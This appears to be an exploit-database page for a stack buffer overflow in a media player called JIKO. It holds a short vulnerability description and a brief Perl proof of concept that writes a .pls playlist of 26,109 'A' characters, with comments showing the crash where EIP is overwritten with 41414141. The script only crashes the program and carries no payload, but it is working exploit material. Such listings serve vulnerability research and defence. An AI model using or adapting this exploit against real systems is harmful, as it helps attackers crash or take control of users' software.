header-logo
Suggest Exploit
vendor:
JIKO
by:
JAWAD
7,8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: JIKO
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2020

Buffer Overflow in JIKO

A buffer overflow vulnerability exists in JIKO, which allows an attacker to execute arbitrary code by supplying a specially crafted .pls file. The vulnerability is caused due to a lack of proper boundary checks when handling user-supplied input. This can be exploited to cause a stack-based buffer overflow by supplying a specially crafted .pls file with an overly long string.

Mitigation:

Apply the latest security patches and ensure that all user input is properly validated.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# JIKO =>JAWAD
#
# Thanx To All Friends : Cyber-Zone , Stack , ZoRLu , Hussin X , Mag!c ompo ,Sad Hacker ,Strock ... All MoroCCaN HaCkerS
#
# No-Exploit.com

# EAX 00000000
# ECX 41414141
# EDX 000008C3
# EBX 000FBBD4 ASCII "F:\perso\test\tool\jiko.pls"
# ESP 000F7298
# EBP 000FBFB4
# ESI 77C2FCE0 msvcrt.77C2FCE0
# EDI 000065FD
# EIP 41414141
# *.Pla || .PLS

my $ex="A" x 26109;

open(MYFILE,'>>jiko.pls');
print MYFILE $ex;
close(MYFILE);

Navigation

Suggest Exploit

Services By CQR